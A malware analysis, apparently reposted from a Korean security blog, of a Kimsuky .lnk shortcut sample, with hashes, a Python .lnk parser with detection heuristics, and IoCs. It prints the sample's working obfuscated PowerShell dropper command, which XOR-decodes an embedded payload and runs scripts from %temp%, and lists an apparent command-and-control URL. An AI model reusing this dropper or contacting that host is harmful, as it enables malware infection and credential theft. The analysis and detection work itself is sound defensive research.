lazarusholic

Everyday is lazarus.dayβ

.lnk malware made by the North Korean APT Kimsuky, presumed to steal login credentials (2024.11.8)

2024-11-13, Sakai
https://wezard4u.tistory.com/429328
#Kimsuky #LNK

Contents

Today I will write about the .lnk malware (2024.11.8) made by the North Korean APT Kimsuky, which is presumed to steal login credentials.
First, the malware hash values are as follows.
File name: .lnk
Size: 5.92 KB
MD5:b7de564386ab778046b1dd3ef76e4b5e
SHA-1:baa69876baa6861db5736c58d2eded93dd1bec6e
SHA-256:e13ad0ebaac36ec363eba5760e69cb995dcae7dcc6afc01bbb31642c3c175d61
Malware internals
StringData
{
namestring: Type: Text Document
Size: 5.23 KB
Date modified: 01/02/2020 11:23
relativepath: not present
workingdir: not present
commandlinearguments: \/c fHjk4fTLlkc5DZfyorHstui9FxC(d)6xw3Jkddddd(d)dddd
dddddfklsjjjjdjjjjjjjjjsdfjjjjjjjjjjjsdfjjjjjsdfjjjjjjjjjjjsssssssdjdddddd
dddikkkkddddddddddddddddddddddddddddd(d)ddddddddddddddddd(d)dddddddddddddd
dddddddddddkddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddd(d)ddddddddddddddddddddddd(d)dddddddddddddddddddddddddd
dddddddddddddkkkkkkkkkkkfffffffffffffffffffffffffffffffffffffffffkkkdkkkkkk
kkkkkkkk(k)kkkkkkkkddddddddddddddddddddddddddddddddddllllllllllllllleZWhdwr
piX+F4gEcRJCp5kdddddddddddddlkjsldkfjlkjlkjlkjlkjjjjjjjjjjjjjjjsdffff(f)fff
ffffffslkjlkksdflkjlknnlksnldkfjli1KXfjUxLJXU8QzW5||goto&P^(o)^w^e^R^S^h^e^
L^L -windowstyle hidden -c function getShapePath(){$l(n)kpath = G^e^t-C^hi^
ld^Item *.lnk;$lnkpath = $lnkpath^| w^he^r(e)-ob^ject {$_.length -eq 0x0000
17B5} ;$lnkpath = $lnkpath^| S^el(^)ect-O^bject -ExpandProperty Name;return
$lnkpath;} function g(e)tImgContent(){$lnkpath = getShapePath;$file = ^g^c
$lnkpath -E^nco^din^g Byte;return $file};function makepath(){$lnkpath = get
Shape(P)ath;$lnkpath = '%temp%\'+$lnkpa(t)h.substring(0,$lnkpath.length-4);
retur(n) $lnkpath};function makepath(1)(){$path1 = '%temp%(\)tmp' + (Get-Ra
ndom) + '(.)vbs';return $pa(t)h1;};function changec(o)ntent(){$file = getIm
gContent; for($i=0; $i -lt $file.count; $i++) { $file[$i] = $file[$i] -bxor
0x77 };return $file;};function s(u)bsave{$path = makepath;$bytes = changeco
ntent;$temp = $bytes ^| select -Skip 005602 ;$temp = ($temp ^|select -SkipL
ast 000460);s(c) $path ([byte[]]($)temp) -Encoding Byte;r(e)turn @($path,$(
b)ytes);};function savecontent(){$_a_res = subsav(e);$path1 = mak(e)path1;
^s^c $path1 ([byt(e)[]]($_a_res[1] ^| sele(c)t -Skip 005609)) -Encoding By
te;return @($_a_res[0],$path1);};$_a_path = savecon(t)ent;$path1 = $_a_path
[0];$path = $_a_p(a)th[1];^& $path1; ^& $path;
iconlocation: C:\Windows\System32\notepad.exe
}
Code analysis
1. Command details
The long string contained in the given commandlinearguments is obfuscated PowerShell …
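The StringData dump above shows what a defender can key on without running the shortcut: a NAME_STRING that mimics an Explorer tooltip, a notepad.exe icon, and a command line padded with thousands of junk characters before a caret-obfuscated "PowerShell" that is launched hidden, reads the .lnk file itself, XOR-decodes the embedded bytes and drops a .vbs under %temp%. The following Python is an added example, not code from the original post or from the author's analysis: a minimal MS-SHLLINK header and StringData parser plus heuristics for exactly those traits. Both .lnk files it inspects are constructed in the script; the suspicious one only reproduces the shape of the indicators and carries no working payload, and the thresholds (1000 characters of arguments, 10 carets) are assumptions chosen for illustration.

```python
"""Minimal .lnk StringData parser with heuristics for the traits seen in the post."""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46} little-endian
STRING_FIELDS = [  # StringData order is fixed by the spec
    ("name", HAS_NAME), ("relativepath", HAS_RELATIVE_PATH), ("workingdir", HAS_WORKING_DIR),
    ("commandlinearguments", HAS_ARGUMENTS), ("iconlocation", HAS_ICON_LOCATION),
]


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the five StringData fields (None when absent)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags, = struct.unpack_from("<I", data, 20)
    show_cmd, = struct.unpack_from("<I", data, 60)
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "showcommand": show_cmd}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            info[field] = None
            continue
        count, = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        info[field] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
    return info


def build_lnk(name=None, args=None, icon=None, show_cmd=1, id_list=b"") -> bytes:
    """Construct a small Unicode .lnk (used here only to make constructed samples)."""
    flags, body = IS_UNICODE, b""
    if id_list:
        flags |= HAS_LINK_TARGET_ID_LIST
        body += struct.pack("<H", len(id_list)) + id_list
    values = {"name": name, "commandlinearguments": args, "iconlocation": icon}
    for field, bit in STRING_FIELDS:
        value = values.get(field)
        if value is not None:
            flags |= bit
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<II", flags, 0)  # flags, attrs
    header += b"\x00" * 24 + struct.pack("<IIIH", 0, 0, show_cmd, 0) + b"\x00" * 10
    return header + body


def strip_carets(s: str) -> str:
    """cmd.exe consumes a lone ^ as an escape, so P^o^w^e^r^s^h^e^l^l runs as powershell."""
    return s.replace("^", "")


def assess_lnk(info: dict) -> list:
    """Heuristic findings; an empty list means nothing from the post's pattern matched."""
    findings = []
    args = info.get("commandlinearguments") or ""
    name = info.get("name") or ""
    icon = (info.get("iconlocation") or "").lower()
    plain = strip_carets(args).lower()
    if len(args) > 1000:
        findings.append(f"oversized arguments ({len(args)} chars): junk padding hides the real command")
    if args.count("^") >= 10:
        findings.append(f"caret-insertion obfuscation ({args.count('^')} carets)")
    if "powershell" in plain and "powershell" not in args.lower():
        findings.append("'powershell' only visible after caret removal")
    if "-windowstyle hidden" in plain:
        findings.append("PowerShell started with a hidden window")
    if "*.lnk" in plain and "-bxor" in plain:
        findings.append("enumerates .lnk files and XOR-decodes bytes: payload embedded in the shortcut")
    if "%temp%" in plain and ".vbs" in plain:
        findings.append("writes a .vbs under %temp%")
    if "Type:" in name and "Size:" in name and "Date modified:" in name:
        findings.append("NAME_STRING mimics an Explorer tooltip")
    if icon.endswith("notepad.exe") and "powershell" in plain:
        findings.append("notepad icon but the command launches PowerShell")
    return findings


# Constructed, inert stand-ins: same markers as the post's sample, no working payload.
CONSTRUCTED_NAME = "Type: Text Document\nSize: 5.23 KB\nDate modified: 01/02/2020 11:23"
CONSTRUCTED_ARGS = ("/c " + "d" * 1200 + "||goto&P^o^w^e^r^s^h^e^l^l -windowstyle hidden -c "
                    "$l = G^e^t-C^h^i^l^d^I^t^e^m *.lnk; $b = $b -bxor 0x77; "
                    "$p = '%temp%\\tmp' + (Get-Random) + '.vbs'")


def suspicious_sample() -> bytes:
    return build_lnk(CONSTRUCTED_NAME, CONSTRUCTED_ARGS, "C:\\Windows\\System32\\notepad.exe", 7)


def benign_sample() -> bytes:
    return build_lnk(args="/c dir", icon="C:\\Windows\\System32\\cmd.exe", id_list=b"\x00\x00")


if __name__ == "__main__":
    for label, blob in (("suspicious", suspicious_sample()), ("benign", benign_sample())):
        print(label, "->", assess_lnk(parse_lnk(blob)) or ["no findings"])
```

The parser deliberately stops after StringData, which is all the heuristics need; a real triage script would also read the LinkTargetIDList and the ExtraData blocks, and would run this over every .lnk in an archive or mail attachment rather than over constructed samples.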

IoC

e13ad0ebaac36ec363eba5760e69cb995dcae7dcc6afc01bbb31642c3c175d61
http://partybbq.co.kr/src/bbs/calendar/upload/up/list